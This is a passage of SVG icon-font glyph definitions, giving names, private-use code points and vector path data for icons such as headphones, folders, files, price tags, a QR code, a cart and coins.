<glyph unicode="&#xed5c;" glyph-name="headphones" d="M288 384h-64v-448h64c17.6 0 32 14.4 32 32v384c0 17.6-14.4 32-32 32zM736 384c-17.602 0-32-14.4-32-32v-384c0-17.6 14.398-32 32-32h64v448h-64zM1024 448c0 282.77-229.23 512-512 512s-512-229.23-512-512c0-61.412 10.83-120.29 30.656-174.848-19.478-33.206-30.656-71.87-30.656-113.152 0-112.846 83.448-206.188 192-221.716v443.418c-31.914-4.566-61.664-15.842-87.754-32.378-5.392 26.718-8.246 54.364-8.246 82.676 0 229.75 186.25 416 416 416s416-186.25 416-416c0-28.314-2.83-55.968-8.22-82.696-26.1 16.546-55.854 27.848-87.78 32.418v-443.44c108.548 15.532 192 108.874 192 221.714 0 41.274-11.178 79.934-30.648 113.138 19.828 54.566 30.648 113.452 30.648 174.866z" />
<glyph unicode="&#xed5d;" glyph-name="music" d="M960 960h64v-736c0-88.366-100.29-160-224-160s-224 71.634-224 160c0 88.368 100.29 160 224 160 62.684 0 119.342-18.4 160-48.040v368.040l-512-113.778v-494.222c0-88.366-100.288-160-224-160s-224 71.634-224 160c0 88.368 100.288 160 224 160 62.684 0 119.342-18.4 160-48.040v624.040l576 128z" />
<glyph unicode="&#xed5e;" glyph-name="play" d="M981.188 799.892c-143.632 20.65-302.332 32.108-469.186 32.108-166.86 0-325.556-11.458-469.194-32.108-27.53-107.726-42.808-226.75-42.808-351.892 0-125.14 15.278-244.166 42.808-351.89 143.638-20.652 302.336-32.11 469.194-32.11 166.854 0 325.552 11.458 469.186 32.11 27.532 107.724 42.812 226.75 42.812 351.89 0 125.142-15.28 244.166-42.812 351.892zM384.002 256v384l320-192-320-192z" />
<glyph unicode="&#xed5f;" glyph-name="film" d="M0 832v-768h1024v768h-1024zM192 128h-128v128h128v-128zM192 384h-128v128h128v-128zM192 640h-128v128h128v-128zM768 128h-512v640h512v-640zM960 128h-128v128h128v-128zM960 384h-128v128h128v-128zM960 640h-128v128h128v-128zM384 640v-384l256 192z" />
<glyph unicode="&#xed60;" glyph-name="video-camera" d="M384 672c0 88.366 71.634 160 160 160s160-71.634 160-160c0-88.366-71.634-160-160-160s-160 71.634-160 160zM0 672c0 88.366 71.634 160 160 160s160-71.634 160-160c0-88.366-71.634-160-160-160s-160 71.634-160 160zM768 352v96c0 35.2-28.8 64-64 64h-640c-35.2 0-64-28.8-64-64v-320c0-35.2 28.8-64 64-64h640c35.2 0 64 28.8 64 64v96l256-160v448l-256-160zM640 192h-512v192h512v-192z" />
<glyph unicode="&#xed61;" glyph-name="dice" d="M864 768h-512c-88 0-160-72-160-160v-512c0-88 72-160 160-160h512c88 0 160 72 160 160v512c0 88-72 160-160 160zM416 64c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96zM416 448c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96zM608 256c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96zM800 64c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96zM800 448c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96zM828.76 832c-14.93 72.804-79.71 128-156.76 128h-512c-88 0-160-72-160-160v-512c0-77.046 55.196-141.83 128-156.76v636.76c0 35.2 28.8 64 64 64h636.76z" />
<glyph unicode="&#xed62;" glyph-name="pacman" d="M964.73 781.196c-93.902 109.45-233.21 178.804-388.73 178.804-282.77 0-512-229.23-512-512s229.23-512 512-512c155.52 0 294.828 69.356 388.728 178.804l-324.728 333.196 324.73 333.196zM704 839.398c39.432 0 71.398-31.964 71.398-71.398 0-39.432-31.966-71.398-71.398-71.398s-71.398 31.966-71.398 71.398c0 39.432 31.966 71.398 71.398 71.398z" />
<glyph unicode="&#xed63;" glyph-name="spades" d="M817.57 611.85c-193.566 143.858-260.266 259.018-305.566 348.148v0c-0.004 0-0.004 0.002-0.004 0.002v-0.002c-45.296-89.13-112-204.292-305.566-348.148-330.036-245.286-19.376-587.668 253.758-399.224-17.796-116.93-78.53-202.172-140.208-238.882v-37.744h384.032v37.74c-61.682 36.708-122.41 121.954-140.212 238.884 273.136-188.446 583.8 153.94 253.766 399.226z" />
<glyph unicode="&#xed64;" glyph-name="clubs" d="M786.832 567.228c-59.032 0-112.086-24.596-149.852-64.694-15.996-16.984-43.762-37.112-73.8-54.81 14.11 53.868 58.676 121.7 89.628 151.456 39.64 38.17 63.984 91.83 63.984 151.5 0.006 114.894-91.476 208.096-204.788 209.32-113.32-1.222-204.796-94.426-204.796-209.318 0-59.672 24.344-113.33 63.986-151.5 30.954-29.756 75.52-97.588 89.628-151.456-30.042 17.7-57.806 37.826-73.8 54.81-37.768 40.098-90.82 64.694-149.85 64.694-114.386 0-207.080-93.664-207.080-209.328 0-115.638 92.692-209.338 207.080-209.338 59.042 0 112.082 25.356 149.85 65.452 16.804 17.872 46.444 40.138 78.292 58.632-3.002-147.692-73.532-256.168-145.318-298.906v-37.742h384.014v37.74c-71.792 42.736-142.32 151.216-145.32 298.906 31.852-18.494 61.488-40.768 78.292-58.632 37.766-40.094 90.808-65.452 149.852-65.452 114.386 0 207.078 93.7 207.078 209.338-0.002 115.664-92.692 209.328-207.080 209.328z" />
<glyph unicode="&#xed65;" glyph-name="diamonds" d="M512 960l-320-512 320-512 320 512z" />
<glyph unicode="&#xed66;" glyph-name="bullhorn" d="M1024 530.744c0 200.926-58.792 363.938-131.482 365.226 0.292 0.006 0.578 0.030 0.872 0.030h-82.942c0 0-194.8-146.336-475.23-203.754-8.56-45.292-14.030-99.274-14.030-161.502s5.466-116.208 14.030-161.5c280.428-57.418 475.23-203.756 475.23-203.756h82.942c-0.292 0-0.578 0.024-0.872 0.032 72.696 1.288 131.482 164.298 131.482 365.224zM864.824 220.748c-9.382 0-19.532 9.742-24.746 15.548-12.63 14.064-24.792 35.96-35.188 63.328-23.256 61.232-36.066 143.31-36.066 231.124 0 87.81 12.81 169.89 36.066 231.122 10.394 27.368 22.562 49.266 35.188 63.328 5.214 5.812 15.364 15.552 24.746 15.552 9.38 0 19.536-9.744 24.744-15.552 12.634-14.064 24.796-35.958 35.188-63.328 23.258-61.23 36.068-143.312 36.068-231.122 0-87.804-12.81-169.888-36.068-231.124-10.39-27.368-22.562-49.264-35.188-63.328-5.208-5.806-15.36-15.548-24.744-15.548zM251.812 530.744c0 51.95 3.81 102.43 11.052 149.094-47.372-6.554-88.942-10.324-140.34-10.324-67.058 0-67.058 0-67.058 0l-55.466-94.686v-88.17l55.46-94.686c0 0 0 0 67.060 0 51.398 0 92.968-3.774 140.34-10.324-7.236 46.664-11.048 97.146-11.048 149.096zM368.15 317.828l-127.998 24.51 81.842-321.544c4.236-16.634 20.744-25.038 36.686-18.654l118.556 47.452c15.944 6.376 22.328 23.964 14.196 39.084l-123.282 229.152zM864.824 411.27c-3.618 0-7.528 3.754-9.538 5.992-4.87 5.42-9.556 13.86-13.562 24.408-8.962 23.6-13.9 55.234-13.9 89.078s4.938 65.478 13.9 89.078c4.006 10.548 8.696 18.988 13.562 24.408 2.010 2.24 5.92 5.994 9.538 5.994 3.616 0 7.53-3.756 9.538-5.994 4.87-5.42 9.556-13.858 13.56-24.408 8.964-23.598 13.902-55.234 13.902-89.078 0-33.842-4.938-65.478-13.902-89.078-4.004-10.548-8.696-18.988-13.56-24.408-2.008-2.238-5.92-5.992-9.538-5.992z" />
<glyph unicode="&#xed67;" glyph-name="connection" horiz-adv-x="1280" d="M640 384c105.87 0 201.87-43.066 271.402-112.598l-90.468-90.468c-46.354 46.356-110.356 75.066-180.934 75.066s-134.578-28.71-180.934-75.066l-90.468 90.468c69.532 69.532 165.532 112.598 271.402 112.598zM187.452 452.548c120.88 120.88 281.598 187.452 452.548 187.452s331.668-66.572 452.55-187.452l-90.51-90.508c-96.706 96.704-225.28 149.96-362.040 149.96-136.762 0-265.334-53.256-362.038-149.962l-90.51 90.51zM988.784 825.562c106.702-45.132 202.516-109.728 284.782-191.996v0l-90.508-90.508c-145.056 145.056-337.92 224.942-543.058 224.942-205.14 0-398-79.886-543.058-224.942l-90.51 90.51c82.268 82.266 178.082 146.862 284.784 191.994 110.504 46.738 227.852 70.438 348.784 70.438s238.278-23.7 348.784-70.438zM576 64c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64z" />
<glyph unicode="&#xed68;" glyph-name="podcast" d="M1024 448c0 282.77-229.23 512-512 512s-512-229.23-512-512c0-220.054 138.836-407.664 333.686-480.068l-13.686-31.932h384l-13.686 31.932c194.85 72.404 333.686 260.014 333.686 480.068zM486.79 325.174c-22.808 9.788-38.79 32.436-38.79 58.826 0 35.346 28.654 64 64 64s64-28.654 64-64c0-26.39-15.978-49.044-38.786-58.834l-25.214 58.834-25.21-58.826zM538.268 322.708c58.092 12.118 101.732 63.602 101.732 125.292 0 70.694-57.306 128-128 128-70.692 0-128-57.306-128-128 0-61.692 43.662-113.122 101.76-125.228l-74.624-174.122c-91.23 39.15-155.136 129.784-155.136 235.35 0 141.384 114.616 268 256 268s256-126.616 256-268c0-105.566-63.906-196.2-155.136-235.35l-74.596 174.058zM688.448-27.708l-73.924 172.486c126.446 42.738 217.476 162.346 217.476 303.222 0 176.73-143.268 320-320 320-176.73 0-320-143.27-320-320 0-140.876 91.030-260.484 217.476-303.222l-73.924-172.486c-159.594 68.488-271.386 227.034-271.386 411.708 0 247.332 200.502 459.834 447.834 459.834s447.834-212.502 447.834-459.834c0-184.674-111.792-343.22-271.386-411.708z" />
<glyph unicode="&#xed69;" glyph-name="feed" d="M384 448c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM664.348 729.474c99.852-54.158 167.652-159.898 167.652-281.474s-67.8-227.316-167.652-281.474c44.066 70.126 71.652 170.27 71.652 281.474s-27.586 211.348-71.652 281.474zM288 448c0-111.204 27.584-211.348 71.652-281.474-99.852 54.16-167.652 159.898-167.652 281.474s67.8 227.314 167.652 281.474c-44.068-70.126-71.652-170.27-71.652-281.474zM96 448c0-171.9 54.404-326.184 140.652-431.722-142.302 90.948-236.652 250.314-236.652 431.722s94.35 340.774 236.652 431.722c-86.248-105.538-140.652-259.822-140.652-431.722zM787.352 879.72c142.298-90.946 236.648-250.312 236.648-431.72s-94.35-340.774-236.648-431.72c86.244 105.536 140.648 259.82 140.648 431.72s-54.404 326.184-140.648 431.72z" />
<glyph unicode="&#xed6a;" glyph-name="mic" d="M480 256c88.366 0 160 71.634 160 160v384c0 88.366-71.634 160-160 160s-160-71.634-160-160v-384c0-88.366 71.636-160 160-160zM704 512v-96c0-123.71-100.29-224-224-224-123.712 0-224 100.29-224 224v96h-64v-96c0-148.238 112.004-270.3 256-286.22v-129.78h-128v-64h320v64h-128v129.78c143.994 15.92 256 137.982 256 286.22v96h-64z" />
<glyph unicode="&#xed6b;" glyph-name="book" d="M896 832v-832h-672c-53.026 0-96 42.98-96 96s42.974 96 96 96h608v768h-640c-70.398 0-128-57.6-128-128v-768c0-70.4 57.602-128 128-128h768v896h-64zM224.056 128v0c-0.018-0.002-0.038 0-0.056 0-17.672 0-32-14.326-32-32s14.328-32 32-32c0.018 0 0.038 0.002 0.056 0.002v-0.002h607.89v64h-607.89z" />
<glyph unicode="&#xed6c;" glyph-name="books" horiz-adv-x="1152" d="M224 832h-192c-17.6 0-32-14.4-32-32v-704c0-17.6 14.4-32 32-32h192c17.6 0 32 14.4 32 32v704c0 17.6-14.4 32-32 32zM192 640h-128v64h128v-64zM544 832h-192c-17.6 0-32-14.4-32-32v-704c0-17.6 14.4-32 32-32h192c17.6 0 32 14.4 32 32v704c0 17.6-14.4 32-32 32zM512 640h-128v64h128v-64zM765.088 782.52l-171.464-86.394c-15.716-7.918-22.096-27.258-14.178-42.976l287.978-571.548c7.918-15.718 27.258-22.098 42.976-14.178l171.464 86.392c15.716 7.92 22.096 27.26 14.178 42.974l-287.978 571.55c-7.92 15.718-27.26 22.1-42.976 14.18z" />
<glyph unicode="&#xed6d;" glyph-name="library" horiz-adv-x="1088" d="M1024 0v64h-64v384h64v64h-192v-64h64v-384h-192v384h64v64h-192v-64h64v-384h-192v384h64v64h-192v-64h64v-384h-192v384h64v64h-192v-64h64v-384h-64v-64h-64v-64h1088v64h-64zM512 960h64l512-320v-64h-1088v64l512 320z" />
<glyph unicode="&#xed6e;" glyph-name="file-text" d="M864 960h-768c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h768c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM832 64h-704v768h704v-768zM256 512h448v-64h-448zM256 384h448v-64h-448zM256 256h448v-64h-448zM256 640h448v-64h-448z" />
<glyph unicode="&#xed6f;" glyph-name="profile" d="M864 960h-768c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h768c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM832 64h-704v768h704v-768zM256 384h448v-64h-448zM256 256h448v-64h-448zM320 672c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM480 576h-128c-52.8 0-96-28.8-96-64v-64h320v64c0 35.2-43.2 64-96 64z" />
<glyph unicode="&#xed70;" glyph-name="file-empty" d="M917.806 730.924c-22.212 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.888-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.984-17.78 50.678-41.878 81.374-72.572zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.326-32 32-32h224v-624z" />
<glyph unicode="&#xed71;" glyph-name="files-empty" d="M917.806 602.924c-22.21 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-368c-44.114 0-80-35.888-80-80v-736c0-44.112 35.886-80 80-80h608c44.112 0 80 35.888 80 80v496c0 14.332-4.372 39.35-42.194 90.924zM785.374 657.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.982-17.78 50.678-41.878 81.374-72.572v0zM896 16c0-8.672-7.328-16-16-16h-608c-8.672 0-16 7.328-16 16v736c0 8.672 7.328 16 16 16 0 0 367.956 0.002 368 0v-224c0-17.672 14.324-32 32-32h224v-496zM602.924 917.804c-51.574 37.822-76.592 42.196-90.924 42.196h-368c-44.112 0-80-35.888-80-80v-736c0-38.632 27.528-70.958 64-78.39v814.39c0 8.672 7.328 16 16 16h486.876c-9.646 7.92-19.028 15.26-27.952 21.804z" />
<glyph unicode="&#xed72;" glyph-name="file-text2" d="M917.806 730.924c-22.212 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.888-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.984-17.78 50.678-41.878 81.374-72.572zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.326-32 32-32h224v-624zM736 128h-448c-17.672 0-32 14.326-32 32s14.328 32 32 32h448c17.674 0 32-14.326 32-32s-14.326-32-32-32zM736 256h-448c-17.672 0-32 14.326-32 32s14.328 32 32 32h448c17.674 0 32-14.326 32-32s-14.326-32-32-32zM736 384h-448c-17.672 0-32 14.326-32 32s14.328 32 32 32h448c17.674 0 32-14.326 32-32s-14.326-32-32-32z" />
<glyph unicode="&#xed73;" glyph-name="file-picture" d="M832 64h-640v128l192 320 263-320 185 128v-256zM832 480c0-53.020-42.98-96-96-96-53.022 0-96 42.98-96 96s42.978 96 96 96c53.020 0 96-42.98 96-96zM917.806 730.924c-22.212 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.888-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.984-17.78 50.678-41.878 81.374-72.572zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.326-32 32-32h224v-624z" />
<glyph unicode="&#xed74;" glyph-name="file-music" d="M917.806 730.924c-22.21 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.886-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.982-17.78 50.678-41.878 81.374-72.572v0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.324-32 32-32h224v-624zM756.288 568.748c-7.414 6.080-17.164 8.514-26.562 6.632l-320-64c-14.958-2.994-25.726-16.126-25.726-31.38v-236.876c-18.832 8.174-40.678 12.876-64 12.876-70.692 0-128-42.98-128-96s57.308-96 128-96 128 42.98 128 96v229.766l256 51.202v-133.842c-18.832 8.174-40.678 12.876-64 12.876-70.692 0-128-42.98-128-96s57.308-96 128-96 128 42.98 128 96v319.998c0 9.586-4.298 18.668-11.712 24.748z" />
<glyph unicode="&#xed75;" glyph-name="file-play" d="M384 576l320-224-320-224v448zM917.806 730.924c-22.212 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.888-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.984-17.78 50.678-41.878 81.374-72.572zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.326-32 32-32h224v-624z" />
<glyph unicode="&#xed76;" glyph-name="file-video" d="M917.806 730.924c-22.208 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.594 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.882-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0 0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.98-17.78 50.678-41.878 81.374-72.572v0 0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.32-32 32-32h224v-624zM256 448h320v-320h-320v320zM576 320l192 128v-320l-192 128z" />
<glyph unicode="&#xed77;" glyph-name="file-zip" d="M917.806 730.924c-22.208 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.884-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0 0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.98-17.78 50.678-41.878 81.374-72.572v0 0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.322-32 32-32h224v-624zM256 896h128v-64h-128v64zM384 832h128v-64h-128v64zM256 768h128v-64h-128v64zM384 704h128v-64h-128v64zM256 640h128v-64h-128v64zM384 576h128v-64h-128v64zM256 512h128v-64h-128v64zM384 448h128v-64h-128v64zM256 112c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-80v64h-128v-272zM448 192v-64h-128v64h128z" />
<glyph unicode="&#xed78;" glyph-name="copy" d="M640 704v256h-448l-192-192v-576h384v-256h640v768h-384zM192 869.49v-101.49h-101.49l101.49 101.49zM64 256v448h192v192h320v-192l-192-192v-256h-320zM576 613.49v-101.49h-101.49l101.49 101.49zM960 0h-512v448h192v192h320v-640z" />
<glyph unicode="&#xed79;" glyph-name="paste" d="M704 832h-128v64c0 35.2-28.8 64-64 64h-128c-35.204 0-64-28.8-64-64v-64h-128v-128h512v128zM512 832h-128v63.886c0.034 0.038 0.072 0.078 0.114 0.114h127.768c0.042-0.036 0.082-0.076 0.118-0.114v-63.886zM832 640v160c0 17.6-14.4 32-32 32h-64v-64h32v-128h-192l-192-192v-256h-256v576h32v64h-64c-17.602 0-32-14.4-32-32v-640c0-17.6 14.398-32 32-32h288v-192h640v704h-192zM576 549.49v-101.49h-101.49l101.49 101.49zM960 0h-512v384h192v192h320v-576z" />
<glyph unicode="&#xed7a;" glyph-name="stack" d="M1024 640l-512 256-512-256 512-256 512 256zM512 811.030l342.058-171.030-342.058-171.030-342.058 171.030 342.058 171.030zM921.444 499.278l102.556-51.278-512-256-512 256 102.556 51.278 409.444-204.722zM921.444 307.278l102.556-51.278-512-256-512 256 102.556 51.278 409.444-204.722z" />
<glyph unicode="&#xed7b;" glyph-name="folder" d="M448 832l128-128h448v-704h-1024v832z" />
<glyph unicode="&#xed7c;" glyph-name="folder-open" d="M832 0l192 512h-832l-192-512zM128 576l-128-576v832h288l128-128h416v-128z" />
<glyph unicode="&#xed7d;" glyph-name="folder-plus" d="M576 704l-128 128h-448v-832h1024v704h-448zM704 256h-128v-128h-128v128h-128v128h128v128h128v-128h128v-128z" />
<glyph unicode="&#xed7e;" glyph-name="folder-minus" d="M576 704l-128 128h-448v-832h1024v704h-448zM704 256h-384v128h384v-128z" />
<glyph unicode="&#xed7f;" glyph-name="folder-download" d="M576 704l-128 128h-448v-832h1024v704h-448zM512 96l-224 224h160v256h128v-256h160l-224-224z" />
<glyph unicode="&#xed80;" glyph-name="folder-upload" d="M576 704l-128 128h-448v-832h1024v704h-448zM512 480l224-224h-160v-256h-128v256h-160l224 224z" />
<glyph unicode="&#xed81;" glyph-name="price-tag" d="M976 960h-384c-26.4 0-63.274-15.274-81.942-33.942l-476.116-476.116c-18.668-18.668-18.668-49.214 0-67.882l412.118-412.118c18.668-18.668 49.214-18.668 67.882 0l476.118 476.118c18.666 18.666 33.94 55.54 33.94 81.94v384c0 26.4-21.6 48-48 48zM736 576c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96z" />
<glyph unicode="&#xed82;" glyph-name="price-tags" horiz-adv-x="1280" d="M1232 960h-384c-26.4 0-63.274-15.274-81.942-33.942l-476.116-476.116c-18.668-18.668-18.668-49.214 0-67.882l412.118-412.118c18.668-18.668 49.214-18.668 67.882 0l476.118 476.118c18.666 18.666 33.94 55.54 33.94 81.94v384c0 26.4-21.6 48-48 48zM992 576c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96zM128 416l544 544h-80c-26.4 0-63.274-15.274-81.942-33.942l-476.116-476.116c-18.668-18.668-18.668-49.214 0-67.882l412.118-412.118c18.668-18.668 49.214-18.668 67.882 0l30.058 30.058-416 416z" />
<glyph unicode="&#xed83;" glyph-name="barcode" d="M0 832h128v-640h-128zM192 832h64v-640h-64zM320 832h64v-640h-64zM512 832h64v-640h-64zM768 832h64v-640h-64zM960 832h64v-640h-64zM640 832h32v-640h-32zM448 832h32v-640h-32zM864 832h32v-640h-32zM0 128h64v-64h-64zM192 128h64v-64h-64zM320 128h64v-64h-64zM640 128h64v-64h-64zM960 128h64v-64h-64zM768 128h128v-64h-128zM448 128h128v-64h-128z" />
<glyph unicode="&#xed84;" glyph-name="qrcode" d="M320 896h-256v-256h256v256zM384 960v0-384h-384v384h384zM128 832h128v-128h-128zM960 896h-256v-256h256v256zM1024 960v0-384h-384v384h384zM768 832h128v-128h-128zM320 256h-256v-256h256v256zM384 320v0-384h-384v384h384zM128 192h128v-128h-128zM448 960h64v-64h-64zM512 896h64v-64h-64zM448 832h64v-64h-64zM512 768h64v-64h-64zM448 704h64v-64h-64zM512 640h64v-64h-64zM448 576h64v-64h-64zM448 448h64v-64h-64zM512 384h64v-64h-64zM448 320h64v-64h-64zM512 256h64v-64h-64zM448 192h64v-64h-64zM512 128h64v-64h-64zM448 64h64v-64h-64zM512 0h64v-64h-64zM960 448h64v-64h-64zM64 448h64v-64h-64zM128 512h64v-64h-64zM0 512h64v-64h-64zM256 512h64v-64h-64zM320 448h64v-64h-64zM384 512h64v-64h-64zM576 448h64v-64h-64zM640 512h64v-64h-64zM704 448h64v-64h-64zM768 512h64v-64h-64zM832 448h64v-64h-64zM896 512h64v-64h-64zM960 320h64v-64h-64zM576 320h64v-64h-64zM640 384h64v-64h-64zM704 320h64v-64h-64zM832 320h64v-64h-64zM896 384h64v-64h-64zM960 192h64v-64h-64zM576 192h64v-64h-64zM640 256h64v-64h-64zM768 256h64v-64h-64zM832 192h64v-64h-64zM896 256h64v-64h-64zM960 64h64v-64h-64zM640 128h64v-64h-64zM704 64h64v-64h-64zM768 128h64v-64h-64zM832 64h64v-64h-64zM640 0h64v-64h-64zM768 0h64v-64h-64zM896 0h64v-64h-64z" />
<glyph unicode="&#xed85;" glyph-name="ticket" d="M575.996 640l127.998-127.998-255.994-255.994-127.998 127.998zM1001.526 662.496l-73.516 73.516-32.008-32.008c-16.378-16.38-39.010-26.51-64-26.51-49.988 0-90.514 40.522-90.514 90.51 0 25.002 10.14 47.638 26.534 64.018l31.988 31.986-73.518 73.516c-29.968 29.968-79.008 29.968-108.976 0l-595.040-595.038c-29.966-29.968-29.966-79.010 0-108.976l73.52-73.518 31.962 31.964c16.382 16.406 39.030 26.552 64.044 26.552 49.988 0 90.51-40.524 90.51-90.51 0-25.006-10.14-47.64-26.534-64.022l-31.984-31.986 73.516-73.518c29.966-29.966 79.008-29.966 108.976 0l595.040 595.040c29.964 29.976 29.964 79.016 0 108.984zM448.002 128.004l-256 256 384 384 256-256-384-384z" />
<glyph unicode="&#xed86;" glyph-name="cart" d="M384 32c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM1024 32c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM1024 448v384h-768c0 35.346-28.654 64-64 64h-192v-64h128l48.074-412.054c-29.294-23.458-48.074-59.5-48.074-99.946 0-70.696 57.308-128 128-128h768v64h-768c-35.346 0-64 28.654-64 64 0 0.218 0.014 0.436 0.016 0.656l831.984 127.344z" />
<glyph unicode="&#xed87;" glyph-name="coin-dollar" d="M480 896c-265.096 0-480-214.904-480-480 0-265.098 214.904-480 480-480 265.098 0 480 214.902 480 480 0 265.096-214.902 480-480 480zM480 32c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.078 0 384-171.922 384-384s-171.922-384-384-384zM512 448v128h128v64h-128v64h-64v-64h-128v-256h128v-128h-128v-64h128v-64h64v64h128.002l-0.002 256h-128zM448 448h-64v128h64v-128zM576.002 256h-64.002v128h64.002v-128z" />
<glyph unicode="&#xed88;" glyph-name="coin-euro" d="M480 896c-265.096 0-480-214.904-480-480s214.904-480 480-480c265.098 0 480 214.902 480 480s-214.902 480-480 480zM480 32c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.076 0 384-171.922 384-384s-171.924-384-384-384zM670.824 315.66c-15.27 8.884-34.862 3.708-43.75-11.57-17.256-29.662-49.088-48.090-83.074-48.090h-128c-41.716 0-77.286 26.754-90.496 64h154.496c17.672 0 32 14.326 32 32s-14.328 32-32 32h-160v64h160c17.672 0 32 14.328 32 32s-14.328 32-32 32h-154.496c13.21 37.246 48.78 64 90.496 64h128c33.986 0 65.818-18.426 83.074-48.090 8.888-15.276 28.478-20.456 43.752-11.568 15.276 8.888 20.456 28.476 11.568 43.752-28.672 49.288-81.702 79.906-138.394 79.906h-128c-77.268 0-141.914-55.056-156.78-128h-35.22c-17.672 0-32-14.328-32-32s14.328-32 32-32h32v-64h-32c-17.672 0-32-14.326-32-32s14.328-32 32-32h35.22c14.866-72.944 79.512-128 156.78-128h128c56.692 0 109.72 30.62 138.394 79.91 8.888 15.276 3.708 34.864-11.57 43.75z" />
